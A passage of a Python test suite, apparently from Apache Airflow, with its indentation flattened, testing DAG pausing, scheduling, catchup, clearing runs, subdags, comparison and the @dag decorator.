session = settings.Session()
dag.sync_to_db(session=session)
orm_dag = session.query(DagModel).filter(DagModel.dag_id == 'dag').one()
assert orm_dag.default_view is not None
assert orm_dag.default_view == "graph"
session.close()
@provide_session
def test_is_paused_subdag(self, session):
subdag_id = 'dag.subdag'
subdag = DAG(
subdag_id,
start_date=DEFAULT_DATE,
)
with subdag:
DummyOperator(
task_id='dummy_task',
)
dag_id = 'dag'
dag = DAG(
dag_id,
start_date=DEFAULT_DATE,
)
with dag:
SubDagOperator(task_id='subdag', subdag=subdag)
# parent_dag and is_subdag was set by DagBag. We don't use DagBag, so this value is not set.
subdag.parent_dag = dag
subdag.is_subdag = True
session.query(DagModel).filter(DagModel.dag_id.in_([subdag_id, dag_id])).delete(
synchronize_session=False
)
dag.sync_to_db(session=session)
unpaused_dags = (
session.query(DagModel.dag_id, DagModel.is_paused)
.filter(
DagModel.dag_id.in_([subdag_id, dag_id]),
)
.all()
)
assert {
(dag_id, False),
(subdag_id, False),
} == set(unpaused_dags)
DagModel.get_dagmodel(dag.dag_id).set_is_paused(is_paused=True, including_subdags=False)
paused_dags = (
session.query(DagModel.dag_id, DagModel.is_paused)
.filter(
DagModel.dag_id.in_([subdag_id, dag_id]),
)
.all()
)
assert {
(dag_id, True),
(subdag_id, False),
} == set(paused_dags)
DagModel.get_dagmodel(dag.dag_id).set_is_paused(is_paused=True)
paused_dags = (
session.query(DagModel.dag_id, DagModel.is_paused)
.filter(
DagModel.dag_id.in_([subdag_id, dag_id]),
)
.all()
)
assert {
(dag_id, True),
(subdag_id, True),
} == set(paused_dags)
def test_existing_dag_is_paused_upon_creation(self):
dag = DAG('dag_paused')
dag.sync_to_db()
assert not dag.get_is_paused()
dag = DAG('dag_paused', is_paused_upon_creation=True)
dag.sync_to_db()
# Since the dag existed before, it should not follow the pause flag upon creation
assert not dag.get_is_paused()
def test_new_dag_is_paused_upon_creation(self):
dag = DAG('new_nonexisting_dag', is_paused_upon_creation=True)
session = settings.Session()
dag.sync_to_db(session=session)
orm_dag = session.query(DagModel).filter(DagModel.dag_id == 'new_nonexisting_dag').one()
# Since the dag didn't exist before, it should follow the pause flag upon creation
assert orm_dag.is_paused
session.close()
def test_existing_dag_default_view(self):
with create_session() as session:
session.add(DagModel(dag_id='dag_default_view_old', default_view=None))
session.commit()
orm_dag = session.query(DagModel).filter(DagModel.dag_id == 'dag_default_view_old').one()
assert orm_dag.default_view is None
assert orm_dag.get_default_view() == conf.get('webserver', 'dag_default_view').lower()
def test_dag_is_deactivated_upon_dagfile_deletion(self):
dag_id = 'old_existing_dag'
dag_fileloc = "/usr/local/airflow/dags/non_existing_path.py"
dag = DAG(
dag_id,
is_paused_upon_creation=True,
)
dag.fileloc = dag_fileloc
session = settings.Session()
with mock.patch.object(settings, "STORE_DAG_CODE", False):
dag.sync_to_db(session=session)
orm_dag = session.query(DagModel).filter(DagModel.dag_id == dag_id).one()
assert orm_dag.is_active
assert orm_dag.fileloc == dag_fileloc
DagModel.deactivate_deleted_dags(list_py_file_paths(settings.DAGS_FOLDER))
orm_dag = session.query(DagModel).filter(DagModel.dag_id == dag_id).one()
assert not orm_dag.is_active
session.execute(DagModel.__table__.delete().where(DagModel.dag_id == dag_id))
session.close()
def test_dag_naive_default_args_start_date_with_timezone(self):
local_tz = pendulum.timezone('Europe/Zurich')
default_args = {'start_date': datetime.datetime(2018, 1, 1, tzinfo=local_tz)}
dag = DAG('DAG', default_args=default_args)
assert dag.timezone.name == local_tz.name
dag = DAG('DAG', default_args=default_args)
assert dag.timezone.name == local_tz.name
def test_roots(self):
"""Verify if dag.roots returns the root tasks of a DAG."""
with DAG("test_dag", start_date=DEFAULT_DATE) as dag:
op1 = DummyOperator(task_id="t1")
op2 = DummyOperator(task_id="t2")
op3 = DummyOperator(task_id="t3")
op4 = DummyOperator(task_id="t4")
op5 = DummyOperator(task_id="t5")
[op1, op2] >> op3 >> [op4, op5]
assert set(dag.roots) == {op1, op2}
def test_leaves(self):
"""Verify if dag.leaves returns the leaf tasks of a DAG."""
with DAG("test_dag", start_date=DEFAULT_DATE) as dag:
op1 = DummyOperator(task_id="t1")
op2 = DummyOperator(task_id="t2")
op3 = DummyOperator(task_id="t3")
op4 = DummyOperator(task_id="t4")
op5 = DummyOperator(task_id="t5")
[op1, op2] >> op3 >> [op4, op5]
assert set(dag.leaves) == {op4, op5}
def test_tree_view(self):
"""Verify correctness of dag.tree_view()."""
with DAG("test_dag", start_date=DEFAULT_DATE) as dag:
op1 = DummyOperator(task_id="t1")
op2 = DummyOperator(task_id="t2")
op3 = DummyOperator(task_id="t3")
op1 >> op2 >> op3
with redirect_stdout(io.StringIO()) as stdout:
dag.tree_view()
stdout = stdout.getvalue()
stdout_lines = stdout.split("\n")
assert 't1' in stdout_lines[0]
assert 't2' in stdout_lines[1]
assert 't3' in stdout_lines[2]
def test_duplicate_task_ids_not_allowed_with_dag_context_manager(self):
"""Verify tasks with Duplicate task_id raises error"""
with pytest.raises(DuplicateTaskIdFound, match="Task id 't1' has already been added to the DAG"):
with DAG("test_dag", start_date=DEFAULT_DATE) as dag:
op1 = DummyOperator(task_id="t1")
op2 = BashOperator(task_id="t1", bash_command="sleep 1")
op1 >> op2
assert dag.task_dict == {op1.task_id: op1}
def test_duplicate_task_ids_not_allowed_without_dag_context_manager(self):
"""Verify tasks with Duplicate task_id raises error"""
with pytest.raises(DuplicateTaskIdFound, match="Task id 't1' has already been added to the DAG"):
dag = DAG("test_dag", start_date=DEFAULT_DATE)
op1 = DummyOperator(task_id="t1", dag=dag)
op2 = DummyOperator(task_id="t1", dag=dag)
op1 >> op2
assert dag.task_dict == {op1.task_id: op1}
def test_duplicate_task_ids_for_same_task_is_allowed(self):
"""Verify that same tasks with Duplicate task_id do not raise error"""
with DAG("test_dag", start_date=DEFAULT_DATE) as dag:
op1 = op2 = DummyOperator(task_id="t1")
op3 = DummyOperator(task_id="t3")
op1 >> op3
op2 >> op3
assert op1 == op2
assert dag.task_dict == {op1.task_id: op1, op3.task_id: op3}
assert dag.task_dict == {op2.task_id: op2, op3.task_id: op3}
def test_sub_dag_updates_all_references_while_deepcopy(self):
with DAG("test_dag", start_date=DEFAULT_DATE) as dag:
op1 = DummyOperator(task_id='t1')
op2 = DummyOperator(task_id='t2')
op3 = DummyOperator(task_id='t3')
op1 >> op2
op2 >> op3
sub_dag = dag.partial_subset('t2', include_upstream=True, include_downstream=False)
assert id(sub_dag.task_dict['t1'].downstream_list[0].dag) == id(sub_dag)
# Copied DAG should not include unused task IDs in used_group_ids
assert 't3' not in sub_dag._task_group.used_group_ids
def test_schedule_dag_no_previous_runs(self):
"""
Tests scheduling a dag with no previous runs
"""
dag_id = "test_schedule_dag_no_previous_runs"
dag = DAG(dag_id=dag_id)
dag.add_task(BaseOperator(task_id="faketastic", owner='Also fake', start_date=TEST_DATE))
dag_run = dag.create_dagrun(
run_type=DagRunType.SCHEDULED,
execution_date=TEST_DATE,
state=State.RUNNING,
)
assert dag_run is not None
assert dag.dag_id == dag_run.dag_id
assert dag_run.run_id is not None
assert '' != dag_run.run_id
assert (
TEST_DATE == dag_run.execution_date
), f'dag_run.execution_date did not match expectation: {dag_run.execution_date}'
assert State.RUNNING == dag_run.state
assert not dag_run.external_trigger
dag.clear()
self._clean_up(dag_id)
@patch('airflow.models.dag.Stats')
def test_dag_handle_callback_crash(self, mock_stats):
"""
Tests avoid crashes from calling dag callbacks exceptions
"""
dag_id = "test_dag_callback_crash"
mock_callback_with_exception = mock.MagicMock()
mock_callback_with_exception.side_effect = Exception
dag = DAG(
dag_id=dag_id,
# callback with invalid signature should not cause crashes
on_success_callback=lambda: 1,
on_failure_callback=mock_callback_with_exception,
)
when = TEST_DATE
dag.add_task(BaseOperator(task_id="faketastic", owner='Also fake', start_date=when))
dag_run = dag.create_dagrun(State.RUNNING, when, run_type=DagRunType.MANUAL)
# should not raise any exception
dag.handle_callback(dag_run, success=False)
dag.handle_callback(dag_run, success=True)
mock_stats.incr.assert_called_with("dag.callback_exceptions")
dag.clear()
self._clean_up(dag_id)
def test_next_dagrun_after_fake_scheduled_previous(self):
"""
Test scheduling a dag where there is a prior DagRun
which has the same run_id as the next run should have
"""
delta = datetime.timedelta(hours=1)
dag_id = "test_schedule_dag_fake_scheduled_previous"
dag = DAG(dag_id=dag_id, schedule_interval=delta, start_date=DEFAULT_DATE)
dag.add_task(BaseOperator(task_id="faketastic", owner='Also fake', start_date=DEFAULT_DATE))
dag.create_dagrun(
run_type=DagRunType.SCHEDULED,
execution_date=DEFAULT_DATE,
state=State.SUCCESS,
external_trigger=True,
)
dag.sync_to_db()
with create_session() as session:
model = session.query(DagModel).get((dag.dag_id,))
# Even though there is a run for this date already, it is marked as manual/external, so we should
# create a scheduled one anyway!
assert model.next_dagrun == DEFAULT_DATE
assert model.next_dagrun_create_after == dag.following_schedule(DEFAULT_DATE)
self._clean_up(dag_id)
def test_schedule_dag_once(self):
"""
Tests scheduling a dag scheduled for @once - should be scheduled the first time
it is called, and not scheduled the second.
"""
dag_id = "test_schedule_dag_once"
dag = DAG(dag_id=dag_id)
dag.schedule_interval = '@once'
assert isinstance(dag.timetable, OnceTimetable)
dag.add_task(BaseOperator(task_id="faketastic", owner='Also fake', start_date=TEST_DATE))
# Sync once to create the DagModel
dag.sync_to_db()
dag.create_dagrun(run_type=DagRunType.SCHEDULED, execution_date=TEST_DATE, state=State.SUCCESS)
# Then sync again after creating the dag run -- this should update next_dagrun
dag.sync_to_db()
with create_session() as session:
model = session.query(DagModel).get((dag.dag_id,))
assert model.next_dagrun is None
assert model.next_dagrun_create_after is None
self._clean_up(dag_id)
def test_fractional_seconds(self):
"""
Tests if fractional seconds are stored in the database
"""
dag_id = "test_fractional_seconds"
dag = DAG(dag_id=dag_id)
dag.schedule_interval = '@once'
dag.add_task(BaseOperator(task_id="faketastic", owner='Also fake', start_date=TEST_DATE))
start_date = timezone.utcnow()
run = dag.create_dagrun(
run_id='test_' + start_date.isoformat(),
execution_date=start_date,
start_date=start_date,
state=State.RUNNING,
external_trigger=False,
)
run.refresh_from_db()
assert start_date == run.execution_date, "dag run execution_date loses precision"
assert start_date == run.start_date, "dag run start_date loses precision "
self._clean_up(dag_id)
def test_pickling(self):
test_dag_id = 'test_pickling'
args = {'owner': 'airflow', 'start_date': DEFAULT_DATE}
dag = DAG(test_dag_id, default_args=args)
dag_pickle = dag.pickle()
assert dag_pickle.pickle.dag_id == dag.dag_id
def test_rich_comparison_ops(self):
test_dag_id = 'test_rich_comparison_ops'
class DAGsubclass(DAG):
pass
args = {'owner': 'airflow', 'start_date': DEFAULT_DATE}
dag = DAG(test_dag_id, default_args=args)
dag_eq = DAG(test_dag_id, default_args=args)
dag_diff_load_time = DAG(test_dag_id, default_args=args)
dag_diff_name = DAG(test_dag_id + '_neq', default_args=args)
dag_subclass = DAGsubclass(test_dag_id, default_args=args)
dag_subclass_diff_name = DAGsubclass(test_dag_id + '2', default_args=args)
for dag_ in [dag_eq, dag_diff_name, dag_subclass, dag_subclass_diff_name]:
dag_.last_loaded = dag.last_loaded
# test identity equality
assert dag == dag
# test dag (in)equality based on _comps
assert dag_eq == dag
assert dag_diff_name != dag
assert dag_diff_load_time != dag
# test dag inequality based on type even if _comps happen to match
assert dag_subclass != dag
# a dag should equal an unpickled version of itself
dump = pickle.dumps(dag)
assert pickle.loads(dump) == dag
# dags are ordered based on dag_id no matter what the type is
assert dag < dag_diff_name
assert dag > dag_diff_load_time
assert dag < dag_subclass_diff_name
# greater than should have been created automatically by functools
assert dag_diff_name > dag
# hashes are non-random and match equality
assert hash(dag) == hash(dag)
assert hash(dag_eq) == hash(dag)
assert hash(dag_diff_name) != hash(dag)
assert hash(dag_subclass) != hash(dag)
def test_get_paused_dag_ids(self):
dag_id = "test_get_paused_dag_ids"
dag = DAG(dag_id, is_paused_upon_creation=True)
dag.sync_to_db()
assert DagModel.get_dagmodel(dag_id) is not None
paused_dag_ids = DagModel.get_paused_dag_ids([dag_id])
assert paused_dag_ids == {dag_id}
with create_session() as session:
session.query(DagModel).filter(DagModel.dag_id == dag_id).delete(synchronize_session=False)
@parameterized.expand(
[
(None, NullTimetable()),
("@daily", cron_timetable("0 0 * * *")),
("@weekly", cron_timetable("0 0 * * 0")),
("@monthly", cron_timetable("0 0 1 * *")),
("@quarterly", cron_timetable("0 0 1 */3 *")),
("@yearly", cron_timetable("0 0 1 1 *")),
("@once", OnceTimetable()),
(datetime.timedelta(days=1), delta_timetable(datetime.timedelta(days=1))),
]
)
def test_timetable(self, schedule_interval, expected_timetable):
dag = DAG("test_schedule_interval", schedule_interval=schedule_interval)
assert dag.timetable == expected_timetable
assert dag.schedule_interval == schedule_interval
def test_create_dagrun_run_id_is_generated(self):
dag = DAG(dag_id="run_id_is_generated")
dr = dag.create_dagrun(run_type=DagRunType.MANUAL, execution_date=DEFAULT_DATE, state=State.NONE)
assert dr.run_id == f"manual__{DEFAULT_DATE.isoformat()}"
def test_create_dagrun_run_type_is_obtained_from_run_id(self):
dag = DAG(dag_id="run_type_is_obtained_from_run_id")
dr = dag.create_dagrun(run_id="scheduled__", state=State.NONE)
assert dr.run_type == DagRunType.SCHEDULED
dr = dag.create_dagrun(run_id="custom_is_set_to_manual", state=State.NONE)
assert dr.run_type == DagRunType.MANUAL
def test_create_dagrun_job_id_is_set(self):
job_id = 42
dag = DAG(dag_id="test_create_dagrun_job_id_is_set")
dr = dag.create_dagrun(
run_id="test_create_dagrun_job_id_is_set", state=State.NONE, creating_job_id=job_id
)
assert dr.creating_job_id == job_id
@parameterized.expand(
[
(State.NONE,),
(State.RUNNING,),
]
)
def test_clear_set_dagrun_state(self, dag_run_state):
dag_id = 'test_clear_set_dagrun_state'
self._clean_up(dag_id)
task_id = 't1'
dag = DAG(dag_id, start_date=DEFAULT_DATE, max_active_runs=1)
t_1 = DummyOperator(task_id=task_id, dag=dag)
session = settings.Session()
dagrun_1 = dag.create_dagrun(
run_type=DagRunType.BACKFILL_JOB,
state=State.FAILED,
start_date=DEFAULT_DATE,
execution_date=DEFAULT_DATE,
)
session.merge(dagrun_1)
task_instance_1 = TI(t_1, execution_date=DEFAULT_DATE, state=State.RUNNING)
session.merge(task_instance_1)
session.commit()
dag.clear(
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=1),
dag_run_state=dag_run_state,
include_subdags=False,
include_parentdag=False,
session=session,
)
dagruns = (
session.query(
DagRun,
)
.filter(
DagRun.dag_id == dag_id,
)
.all()
)
assert len(dagruns) == 1
dagrun = dagruns[0] # type: DagRun
assert dagrun.state == dag_run_state
def _make_test_subdag(self, session):
dag_id = 'test_subdag'
self._clean_up(dag_id)
task_id = 't1'
dag = DAG(dag_id, start_date=DEFAULT_DATE, max_active_runs=1)
t_1 = DummyOperator(task_id=task_id, dag=dag)
subdag = DAG(dag_id + '.test', start_date=DEFAULT_DATE, max_active_runs=1)
SubDagOperator(task_id='test', subdag=subdag, dag=dag)
t_2 = DummyOperator(task_id='task', dag=subdag)
subdag.parent_dag = dag
subdag.is_subdag = True
dag.sync_to_db()
session = settings.Session()
dag.create_dagrun(
run_type=DagRunType.MANUAL,
state=State.FAILED,
start_date=DEFAULT_DATE,
execution_date=DEFAULT_DATE,
session=session,
)
subdag.create_dagrun(
run_type=DagRunType.MANUAL,
state=State.FAILED,
start_date=DEFAULT_DATE,
execution_date=DEFAULT_DATE,
session=session,
)
task_instance_1 = TI(t_1, execution_date=DEFAULT_DATE, state=State.RUNNING)
task_instance_2 = TI(t_2, execution_date=DEFAULT_DATE, state=State.RUNNING)
session.merge(task_instance_1)
session.merge(task_instance_2)
return dag, subdag
@parameterized.expand(
[
(State.NONE,),
(State.RUNNING,),
]
)
def test_clear_set_dagrun_state_for_subdag(self, dag_run_state):
session = settings.Session()
dag, subdag = self._make_test_subdag(session)
session.flush()
dag.clear(
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=1),
dag_run_state=dag_run_state,
include_subdags=True,
include_parentdag=False,
session=session,
)
dagrun = (
session.query(
DagRun,
)
.filter(DagRun.dag_id == subdag.dag_id)
.one()
)
assert dagrun.state == dag_run_state
session.rollback()
@parameterized.expand(
[
(State.NONE,),
(State.RUNNING,),
]
)
def test_clear_set_dagrun_state_for_parent_dag(self, dag_run_state):
session = settings.Session()
dag, subdag = self._make_test_subdag(session)
session.flush()
subdag.clear(
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=1),
dag_run_state=dag_run_state,
include_subdags=True,
include_parentdag=True,
session=session,
)
dagrun = (
session.query(
DagRun,
)
.filter(DagRun.dag_id == dag.dag_id)
.one()
)
assert dagrun.state == dag_run_state
@parameterized.expand(
[(state, State.NONE) for state in State.task_states if state != State.RUNNING]
+ [(State.RUNNING, State.SHUTDOWN)]
) # type: ignore
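    # Clearing a TI that is not RUNNING resets it to NONE; clearing a RUNNING TI
    # moves it to SHUTDOWN (that is what the (begin, end) pairs above encode).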
def test_clear_dag(self, ti_state_begin, ti_state_end: Optional[str]):
dag_id = 'test_clear_dag'
self._clean_up(dag_id)
task_id = 't1'
dag = DAG(dag_id, start_date=DEFAULT_DATE, max_active_runs=1)
t_1 = DummyOperator(task_id=task_id, dag=dag)
session = settings.Session() # type: ignore
dagrun_1 = dag.create_dagrun(
run_type=DagRunType.BACKFILL_JOB,
state=State.RUNNING,
start_date=DEFAULT_DATE,
execution_date=DEFAULT_DATE,
)
session.merge(dagrun_1)
task_instance_1 = TI(t_1, execution_date=DEFAULT_DATE, state=ti_state_begin)
task_instance_1.job_id = 123
session.merge(task_instance_1)
session.commit()
dag.clear(
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=1),
session=session,
)
task_instances = (
session.query(
TI,
)
.filter(
TI.dag_id == dag_id,
)
.all()
)
assert len(task_instances) == 1
task_instance = task_instances[0] # type: TI
assert task_instance.state == ti_state_end
self._clean_up(dag_id)
def test_next_dagrun_info_once(self):
dag = DAG(
'test_scheduler_dagrun_once', start_date=timezone.datetime(2015, 1, 1), schedule_interval="@once"
)
next_date, _ = dag.next_dagrun_info(None)
assert next_date == timezone.datetime(2015, 1, 1)
next_date, _ = dag.next_dagrun_info(next_date)
assert next_date is None
def test_next_dagrun_info_start_end_dates(self):
"""
Tests that an attempt to schedule a task after the Dag's end_date
does not succeed.
"""
delta = datetime.timedelta(hours=1)
runs = 3
start_date = DEFAULT_DATE
end_date = start_date + (runs - 1) * delta
dag_id = "test_schedule_dag_start_end_dates"
dag = DAG(dag_id=dag_id, start_date=start_date, end_date=end_date, schedule_interval=delta)
dag.add_task(BaseOperator(task_id='faketastic', owner='Also fake'))
# Create and schedule the dag runs
dates = []
date = None
for _ in range(runs):
date, _ = dag.next_dagrun_info(date)
dates.append(date)
for date in dates:
assert date is not None
assert dates[-1] == end_date
assert dag.next_dagrun_info(date)[0] is None
def test_next_dagrun_info_catchup(self):
"""
Test to check that a DAG with catchup = False only schedules beginning now, not back to the start date
"""
def make_dag(dag_id, schedule_interval, start_date, catchup):
default_args = {
'owner': 'airflow',
'depends_on_past': False,
}
dag = DAG(
dag_id,
schedule_interval=schedule_interval,
start_date=start_date,
catchup=catchup,
default_args=default_args,
)
op1 = DummyOperator(task_id='t1', dag=dag)
op2 = DummyOperator(task_id='t2', dag=dag)
op3 = DummyOperator(task_id='t3', dag=dag)
op1 >> op2 >> op3
return dag
now = timezone.utcnow()
six_hours_ago_to_the_hour = (now - datetime.timedelta(hours=6)).replace(
minute=0, second=0, microsecond=0
)
half_an_hour_ago = now - datetime.timedelta(minutes=30)
two_hours_ago = now - datetime.timedelta(hours=2)
dag1 = make_dag(
dag_id='dag_without_catchup_ten_minute',
schedule_interval='*/10 * * * *',
start_date=six_hours_ago_to_the_hour,
catchup=False,
)
next_date, _ = dag1.next_dagrun_info(None)
# The DR should be scheduled in the last half an hour, not 6 hours ago
assert next_date > half_an_hour_ago
assert next_date < timezone.utcnow()
dag2 = make_dag(
dag_id='dag_without_catchup_hourly',
schedule_interval='@hourly',
start_date=six_hours_ago_to_the_hour,
catchup=False,
)
next_date, _ = dag2.next_dagrun_info(None)
# The DR should be scheduled in the last 2 hours, not 6 hours ago
assert next_date > two_hours_ago
# The DR should be scheduled BEFORE now
assert next_date < timezone.utcnow()
dag3 = make_dag(
dag_id='dag_without_catchup_once',
schedule_interval='@once',
start_date=six_hours_ago_to_the_hour,
catchup=False,
)
next_date, _ = dag3.next_dagrun_info(None)
        # With @once the DR is scheduled exactly at the start date, even with catchup=False
assert next_date == six_hours_ago_to_the_hour
@freeze_time(timezone.datetime(2020, 1, 5))
def test_next_dagrun_info_timedelta_schedule_and_catchup_false(self):
"""
Test that the dag file processor does not create multiple dagruns
if a dag is scheduled with 'timedelta' and catchup=False
"""
dag = DAG(
'test_scheduler_dagrun_once_with_timedelta_and_catchup_false',
start_date=timezone.datetime(2015, 1, 1),
schedule_interval=timedelta(days=1),
catchup=False,
)
next_date, _ = dag.next_dagrun_info(None)
assert next_date == timezone.datetime(2020, 1, 4)
# The date to create is in the future, this is handled by "DagModel.dags_needing_dagruns"
next_date, _ = dag.next_dagrun_info(next_date)
assert next_date == timezone.datetime(2020, 1, 5)
@freeze_time(timezone.datetime(2020, 5, 4))
def test_next_dagrun_info_timedelta_schedule_and_catchup_true(self):
"""
Test that the dag file processor creates multiple dagruns
if a dag is scheduled with 'timedelta' and catchup=True
"""
dag = DAG(
'test_scheduler_dagrun_once_with_timedelta_and_catchup_true',
start_date=timezone.datetime(2020, 5, 1),
schedule_interval=timedelta(days=1),
catchup=True,
)
next_date, _ = dag.next_dagrun_info(None)
assert next_date == timezone.datetime(2020, 5, 1)
next_date, _ = dag.next_dagrun_info(next_date)
assert next_date == timezone.datetime(2020, 5, 2)
next_date, _ = dag.next_dagrun_info(next_date)
assert next_date == timezone.datetime(2020, 5, 3)
# The date to create is in the future, this is handled by "DagModel.dags_needing_dagruns"
next_date, _ = dag.next_dagrun_info(next_date)
assert next_date == timezone.datetime(2020, 5, 4)
def test_next_dagrun_after_auto_align(self):
"""
Test if the schedule_interval will be auto aligned with the start_date
such that if the start_date coincides with the schedule the first
execution_date will be start_date, otherwise it will be start_date +
interval.
"""
dag = DAG(
dag_id='test_scheduler_auto_align_1',
start_date=timezone.datetime(2016, 1, 1, 10, 10, 0),
schedule_interval="4 5 * * *",
)
DummyOperator(task_id='dummy', dag=dag, owner='airflow')
next_date, _ = dag.next_dagrun_info(None)
assert next_date == timezone.datetime(2016, 1, 2, 5, 4)
dag = DAG(
dag_id='test_scheduler_auto_align_2',
start_date=timezone.datetime(2016, 1, 1, 10, 10, 0),
schedule_interval="10 10 * * *",
)
DummyOperator(task_id='dummy', dag=dag, owner='airflow')
next_date, _ = dag.next_dagrun_info(None)
assert next_date == timezone.datetime(2016, 1, 1, 10, 10)
def test_next_dagrun_after_not_for_subdags(self):
"""
        Test that subdags are never marked to have dagruns created, as they are
handled by the SubDagOperator, not the scheduler
"""
def subdag(parent_dag_name, child_dag_name, args):
"""
Create a subdag.
"""
dag_subdag = DAG(
dag_id=f'{parent_dag_name}.{child_dag_name}',
schedule_interval="@daily",
default_args=args,
)
for i in range(2):
DummyOperator(task_id=f'{child_dag_name}-task-{i + 1}', dag=dag_subdag)
return dag_subdag
with DAG(
dag_id='test_subdag_operator',
start_date=datetime.datetime(2019, 1, 1),
max_active_runs=1,
schedule_interval=timedelta(minutes=1),
) as dag:
section_1 = SubDagOperator(
task_id='section-1',
subdag=subdag(dag.dag_id, 'section-1', {'start_date': dag.start_date}),
)
subdag = section_1.subdag
# parent_dag and is_subdag was set by DagBag. We don't use DagBag, so this value is not set.
subdag.parent_dag = dag
subdag.is_subdag = True
next_date, _ = dag.next_dagrun_info(None)
assert next_date == timezone.datetime(2019, 1, 1, 0, 0)
next_subdag_date, _ = subdag.next_dagrun_info(None)
assert next_subdag_date is None, "SubDags should never have DagRuns created by the scheduler"
def test_replace_outdated_access_control_actions(self):
outdated_permissions = {
'role1': {permissions.ACTION_CAN_READ, permissions.ACTION_CAN_EDIT},
'role2': {permissions.DEPRECATED_ACTION_CAN_DAG_READ, permissions.DEPRECATED_ACTION_CAN_DAG_EDIT},
}
updated_permissions = {
'role1': {permissions.ACTION_CAN_READ, permissions.ACTION_CAN_EDIT},
'role2': {permissions.ACTION_CAN_READ, permissions.ACTION_CAN_EDIT},
}
with pytest.warns(DeprecationWarning):
dag = DAG(dag_id='dag_with_outdated_perms', access_control=outdated_permissions)
assert dag.access_control == updated_permissions
with pytest.warns(DeprecationWarning):
dag.access_control = outdated_permissions
assert dag.access_control == updated_permissions
class TestDagModel:
def test_dags_needing_dagruns_not_too_early(self):
dag = DAG(dag_id='far_future_dag', start_date=timezone.datetime(2038, 1, 1))
DummyOperator(task_id='dummy', dag=dag, owner='airflow')
session = settings.Session()
orm_dag = DagModel(
dag_id=dag.dag_id,
max_active_tasks=1,
has_task_concurrency_limits=False,
next_dagrun=dag.start_date,
next_dagrun_create_after=timezone.datetime(2038, 1, 2),
is_active=True,
)
session.add(orm_dag)
session.flush()
dag_models = DagModel.dags_needing_dagruns(session).all()
assert dag_models == []
session.rollback()
session.close()
def test_dags_needing_dagruns_only_unpaused(self):
"""
        We should never create dagruns for paused DAGs
"""
dag = DAG(dag_id='test_dags', start_date=DEFAULT_DATE)
DummyOperator(task_id='dummy', dag=dag, owner='airflow')
session = settings.Session()
orm_dag = DagModel(
dag_id=dag.dag_id,
has_task_concurrency_limits=False,
next_dagrun=dag.start_date,
next_dagrun_create_after=dag.following_schedule(DEFAULT_DATE),
is_active=True,
)
session.add(orm_dag)
session.flush()
needed = DagModel.dags_needing_dagruns(session).all()
assert needed == [orm_dag]
orm_dag.is_paused = True
session.flush()
dag_models = DagModel.dags_needing_dagruns(session).all()
assert dag_models == []
session.rollback()
session.close()
class TestQueries(unittest.TestCase):
def setUp(self) -> None:
clear_db_runs()
def tearDown(self) -> None:
clear_db_runs()
@parameterized.expand(
[
(3,),
(12,),
]
)
def test_count_number_queries(self, tasks_count):
dag = DAG('test_dagrun_query_count', start_date=DEFAULT_DATE)
for i in range(tasks_count):
DummyOperator(task_id=f'dummy_task_{i}', owner='test', dag=dag)
with assert_queries_count(2):
dag.create_dagrun(
run_id="test_dagrun_query_count",
state=State.RUNNING,
execution_date=TEST_DATE,
)
class TestDagDecorator(unittest.TestCase):
DEFAULT_ARGS = {
"owner": "test",
"depends_on_past": True,
"start_date": timezone.utcnow(),
"retries": 1,
"retry_delay": timedelta(minutes=1),
}
DEFAULT_DATE = timezone.datetime(2016, 1, 1)
VALUE = 42
def setUp(self):
super().setUp()
self.operator = None
def tearDown(self):
super().tearDown()
clear_db_runs()
def test_fileloc(self):
@dag_decorator(default_args=self.DEFAULT_ARGS)
def noop_pipeline():
...
dag = noop_pipeline()
assert isinstance(dag, DAG)
        assert dag.dag_id == 'noop_pipeline'
assert dag.fileloc == __file__
def test_set_dag_id(self):
"""Test that checks you can set dag_id from decorator."""
@dag_decorator('test', default_args=self.DEFAULT_ARGS)
def noop_pipeline():
@task_decorator
def return_num(num):
return num
return_num(4)
dag = noop_pipeline()
assert isinstance(dag, DAG)
        assert dag.dag_id == 'test'
def test_default_dag_id(self):
"""Test that @dag uses function name as default dag id."""
@dag_decorator(default_args=self.DEFAULT_ARGS)
def noop_pipeline():
@task_decorator
def return_num(num):
return num
return_num(4)
dag = noop_pipeline()
assert isinstance(dag, DAG)
        assert dag.dag_id == 'noop_pipeline'
def test_documentation_added(self):
"""Test that @dag uses function docs as doc_md for DAG object"""
@dag_decorator(default_args=self.DEFAULT_ARGS)
def noop_pipeline():
"""
Regular DAG documentation
"""
@task_decorator
def return_num(num):
return num
return_num(4)
dag = noop_pipeline()
assert isinstance(dag, DAG)
        assert dag.dag_id == 'noop_pipeline'
        assert dag.doc_md.strip() == "Regular DAG documentation"
def test_fails_if_arg_not_set(self):
"""Test that @dag decorated function fails if positional argument is not set"""
@dag_decorator(default_args=self.DEFAULT_ARGS)
def noop_pipeline(value):
@task_decorator
def return_num(num):
return num
return_num(value)
# Test that if arg is not passed it raises a type error as expected.
with pytest.raises(TypeError):
noop_pipeline()
def test_dag_param_resolves(self):
"""Test that dag param is correctly resolved by operator"""
@dag_decorator(default_args=self.DEFAULT_ARGS)
def xcom_pass_to_op(value=self.VALUE):
@task_decorator
def return_num(num):
return num
xcom_arg = return_num(value)
self.operator = xcom_arg.operator
dag = xcom_pass_to_op()
dr = dag.create_dagrun(
run_id=DagRunType.MANUAL.value,
start_date=timezone.utcnow(),
execution_date=self.DEFAULT_DATE,
state=State.RUNNING,
)
self.operator.run(start_date=self.DEFAULT_DATE, end_date=self.DEFAULT_DATE)
ti = dr.get_task_instances()[0]
assert ti.xcom_pull() == self.VALUE
def test_dag_param_dagrun_parameterized(self):
"""Test that dag param is correctly overwritten when set in dag run"""
@dag_decorator(default_args=self.DEFAULT_ARGS)
def xcom_pass_to_op(value=self.VALUE):
@task_decorator
def return_num(num):
return num
assert isinstance(value, DagParam)
xcom_arg = return_num(value)
self.operator = xcom_arg.operator
dag = xcom_pass_to_op()
new_value = 52
dr = dag.create_dagrun(
run_id=DagRunType.MANUAL.value,
start_date=timezone.utcnow(),
execution_date=self.DEFAULT_DATE,
state=State.RUNNING,
conf={'value': new_value},
)
self.operator.run(start_date=self.DEFAULT_DATE, end_date=self.DEFAULT_DATE)
ti = dr.get_task_instances()[0]
        assert ti.xcom_pull() == new_value
def test_set_params_for_dag(self):
"""Test that dag param is correctly set when using dag decorator"""
@dag_decorator(default_args=self.DEFAULT_ARGS)
def xcom_pass_to_op(value=self.VALUE):
@task_decorator
